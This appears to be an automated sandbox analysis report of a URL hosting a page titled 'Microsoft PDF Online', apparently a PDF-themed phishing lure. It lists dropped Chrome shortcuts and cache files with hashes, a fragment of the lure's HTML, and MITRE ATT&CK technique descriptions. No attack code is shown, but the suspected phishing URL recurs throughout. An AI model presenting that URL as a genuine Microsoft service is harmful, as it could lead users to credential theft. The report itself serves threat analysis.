Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 09:54:47 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9889271231004435
Encrypted:	false
SSDEEP:
MD5:	8464D0C80F11FA8B9FC4FF50375AF649
SHA1:	0BC6D883034D2D9F1CC37CE356277B3F846CFB12
SHA-256:	544A5C34716AE6F1F0BC6458EFF73F319014F7DB7DECC3F6AFEF208FEB13B834
SHA-512:	16C33B72AE82CB37D78F23C9156308ED985959435294F5DAA2D74B87B388E3ACABFDD1300E222E8C92EE9A9762B3D4AD5A1C11813D68832C9AC233F8C20C9FAE
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,......u.Nc..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IZ.V....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VZ.V....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VZ.V....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VZ.V..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VZ.V...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........%f......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 09:54:47 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	4.002537660117404
Encrypted:	false
SSDEEP:
MD5:	42214313214125D2888F8E5992C418B5
SHA1:	3CF40D72A0B01CDDC0C023450929A0D2081F7E5E
SHA-256:	21747024A7AD321AD897A6CEEE458389CD954EE83B366C88C742134000F19CE3
SHA-512:	3A1323BA65065D6D4946771DF6DAA7DBE846BB1EEE84F5F46A09C2569D041BD4F275E4E50DFF7E7592C3ABEB2C23D9C5767F42539AA5526BB6BFA6256B6B42A0
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....1.i.Nc..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IZ.V....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VZ.V....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VZ.V....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VZ.V..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VZ.V...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........%f......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.014912955698429
Encrypted:	false
SSDEEP:
MD5:	BE31B240BD3753C1FE7481500C5B0C28
SHA1:	22A09A8F76356920A8D062798AEEB0BBB49F9911
SHA-256:	3E84DA5B385FE4ECD584CFFA0C0F47FE2030B4D79D0528F2A8C8B7E9966C0397
SHA-512:	E4D792F33190BE4BAE816E168ADB9A74517104F7DEAA4E60A77F24B3F63F8A3B07A482813C83E79A982A3477CAE08C825603CEB1922448F673210BC93D1ABFE6
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IZ.V....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VZ.V....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VZ.V....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VZ.V..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........%f......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 09:54:47 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	4.000554969728006
Encrypted:	false
SSDEEP:
MD5:	86048BAF7C1C74A927B522A926BA2D4F
SHA1:	D62C7262BD68F075527BAAB75753CF80F887129F
SHA-256:	AB412816504E8A841F888A73BE2CA5F1C7C768A7C9F0B2A6BD744E1308241C61
SHA-512:	BF893B9A760F5409922600AE19125560DD97AEAD54863ED7094C620A92D9D6D7CBB954C8977B67E88818854597226ADAD45510A8C061EB3955FA8D12C16F76F0
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....3Kc.Nc..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IZ.V....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VZ.V....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VZ.V....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VZ.V..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VZ.V...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........%f......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 09:54:47 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.99017814937918
Encrypted:	false
SSDEEP:
MD5:	060389BD48FA84140F85009F1EC38BA6
SHA1:	DC6BDD5E1B0E3EEF8CEB81EB864FBDD1CE3FBCBC
SHA-256:	E1B77D3EA653A410546D109B1AACE03FE58FD91B94A1F00676F9B704F11BA547
SHA-512:	06529FB03F88F1BF5F70B3081C2D5859D6EA52DDF1576390CFAB96143D4F43FD71FE3DFF60505DFD563835DD8D2FCD8F7EB993D28CC6E643DAC69BF52C73BACE
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,......o.Nc..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IZ.V....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VZ.V....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VZ.V....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VZ.V..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VZ.V...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........%f......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 09:54:47 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	4.002555284049065
Encrypted:	false
SSDEEP:
MD5:	3B3712D7EE4CF8EA53E9C9421035D5A5
SHA1:	33AE4D1AC5DE7B096D905BD14CA25CEFB86C6D77
SHA-256:	C07A92FC63105690B356FF930F288C77DAB7394034928F95BB236F988A818C14
SHA-512:	5D432C22BE92EF09079A9411D2E12486D7CE026AA7B1F17F422930642ADFBD0A0836D23810A153BF6EE2DD0383B411982DADB390D17D3DA300B78ED4AFF88E37
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,......X.Nc..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IZ.V....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VZ.V....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VZ.V....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VZ.V..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VZ.V...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........%f......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 61

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	dropped
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	unknown
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 62

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (63533), with CRLF line terminators
Category:	downloaded
Size (bytes):	525002
Entropy (8bit):	6.033306230250027
Encrypted:	false
SSDEEP:
MD5:	41932332574AF9A16DDD1FFC98CE7339
SHA1:	3F374B8B9E8D2E0034ED3331D7FD07EFFB31D307
SHA-256:	9F05F7571B5AD06DC611E7FDE582CB3748926E45B23F497ACAA126FD1878784A
SHA-512:	7A1E199E99F2E3A365C319EE507143A7D7D5F3971892188A3D3594FFD6197D769B003CD93A932172D386F6CFE08A405F3A8461ACE435015E9874F68922CE0425
Malicious:	false
Reputation:	unknown
URL:	https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html
Preview:	<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Microsoft PDF Online</title>...<link rel="shortcut icon" href="https://cdn.icon-icons.com/icons2/886/PNG/512/file-expand_Pdf_icon-icons.com_68956.png"/>.... <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>......<style>..body, html { margin: 0; font-family: Arial, Helvetica, sans-serif; ..}..* {.. box-sizing: border-box;..}...bg-image {.. /* The image used /.. background-image: url("/exl.png");.. opacity: 0.3;.. / Add the blur effect / filter: blur(-px); -webkit-filter: blur(-px);.. / Full height / height: 100%; / Center and scale the image nicely /.. background-position: center; background-repeat: no-repeat; background-size: cover;..}..../ Position text in the middle of the page/image */...bg-text {.. background: #FFF;.. width:400px; height:500px; -webkit-box-shadow: 1px 1px 15px 1px #000000

Chrome Cache Entry: 63

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	14457
Entropy (8bit):	7.724590627564223
Encrypted:	false
SSDEEP:
MD5:	BE0737BB80699F91D5F504291578B8C6
SHA1:	46228FBD9B5FBD9189D7D788A814AACDA6B81C03
SHA-256:	DAFEDD8328C04F89812F478F15CDD702056E8CC59EFBCB9133D0E4FE2FC46FD0
SHA-512:	CCCC8F6162043A59AD315B9E66E7245E131D3831F518A5514417542C165C3127ABED1125FAA25B20964BDCC04C7EB826A33918CF745901D2B329B09ACC8679AD
Malicious:	false
Reputation:	unknown
URL:	https://cdn.icon-icons.com/icons2/886/PNG/512/file-expand_Pdf_icon-icons.com_68956.png
Preview:	.PNG........IHDR..............x......sBIT....\|.d.....pHYs..7]..7]...F]....tEXtSoftware.www.inkscape.org..<... .IDATx...y.\e....9...&..pEE..N..R.I..l2F....(2.....qp.P.u\P.....t....$.H.....`@..u.y~.t...tw....:..uqI......u.:....................................er.J.e>.\.H....%M..D.&d=' I...L.....V..V..X..'.X.R.zN.aP..........t..0YK.3.!....s..Kq.:..>..L.F......\..tI.............%.[..Y..`.P.....+.3&.:.Y......K..z..#C....V.Y.%3;2.Y.\|._F.}...]..$..F....u...d:9.Y..r.......r.CY..`.(.#..u........3+e=...\..d...yvM......-..0...5...g..../+.F...K..z..... .]..U3-`.....M...w....d=..g..`.\|..R......g=..,.I...e~..Y.......>y....g2;>.Y.&...O......(2..V.<...(..L..z.....Qm..r]..EE....'.Sk.s....>...o8...d...5x...gl...1..Z4.:/O.X@.(...N..?Po.. ;.?.P...3.,.9.".p.P.....7.Y`.1..#.`n..X..v..-...1...[..60R>.}U...%?.L.-....:..4K.o!%......?..Z...u..w....c..e.n.V.hT~\|..j...M.)n:......uS..P.y.e..+t...6.Q......xW....sn.fK......G!..w.qhM....q...]..yV...r.<...

Chrome Cache Entry: 64

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	28
Entropy (8bit):	4.066108939837481
Encrypted:	false
SSDEEP:
MD5:	941333316D1A8BEF5A53F630725D32B4
SHA1:	A6F5054A42DDE9015C8F7B24FDFC1F4191D73BB0
SHA-256:	F162092ECFA8BC0045E2DC23961E45FEB576812D502CD07DCD193E856453F8FE
SHA-512:	7E87E811E7C548112FD1590AF481089B3E0D7D9E29AD202C723AC3D2F06AEA41577E4FBAD573948C2BD177F2F6B077904F37CD516B0A2E35194ED983608A10E5
Malicious:	false
Reputation:	unknown
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwkLIZBEg1MNyRIFDamYCo0SBQ1gSAjf?alt=proto
Preview:	ChIKBw2pmAqNGgAKBw1gSAjfGgA=

Chrome Cache Entry: 65

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	11352
Entropy (8bit):	7.729942514997727
Encrypted:	false
SSDEEP:
MD5:	A624F545DE54B4A2C079CCDAE0369BE3
SHA1:	470A60ED2283732663D4171C2E34A4C4D8F852E5
SHA-256:	EC12702E0DB9DA81DE336E211C13DE7EB26D58EBA8A20D9A880076EBAF982E13
SHA-512:	9FD8E840DCC7898A0BE1C6FB56C746EBBE4B79C76A3E45D8890F55A1A5E96CFCE9136DF982AFC027301562BBF65F672E04276774762B3D65C60E91EC78EC8967
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............x....,.IDATx...1.\U...Z..p....&.q....f7o..VB.."...v.....b.. +.F..Yl.c...E.......,".8.z$ V6.^.{....S~............................C.k+.......6..9.NNr.4^3..,....)!...C..U>.I>0..Y.7}".y.>.....7.%S..I.Z..R....K.KN.3Sy..W...0t.!+.r.Tn.Z...Kq.U.1.w].h..!.$[..f.%M.!.k.6.....'Mk...-bB.../\......u\|,..Y.....hY.#o_}..@.\|].s....J-]BJ...[N..o....j..9n.K-YBJ.i..7.....0m...R...Zb........%.G....)!5.T~.....P"_[Y...K-QB. ;.^x$.@)...`?.Z...Q.W..d.......O...T.3..t..?.~.'...``8.G.#....6.J-FB..F..C..9~...[....%.`itf.1.6..z$.....io..fIN.T.f..-..........\|.i...\|<..).......1...U..$.0..T-.......r...<r..Y...OF......b..?..g.0.<I.........+}M.'.6....%y.T.3....'M.oI.._.....o...f..(.i<.T>..}<......=#.@.,.V.........r....8..f_?....`....o.J_.....`.....\..V?N......1..=...........,..?...0..T.T.{8..).`...GNr..}(....."...`)..L........::.\f.9..0....Rs.S..x............x.o/.`...KN..L.\......\.6.Fg..F.....k...jL..#.@]L.....,.....u.$w;....#..#.@]..G...

Static File Info

⊘No static file info

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

LLM Input / Output

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 61

Chrome Cache Entry: 62

Chrome Cache Entry: 63

Chrome Cache Entry: 64

Chrome Cache Entry: 65

Static File Info

Windows Analysis Report
https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html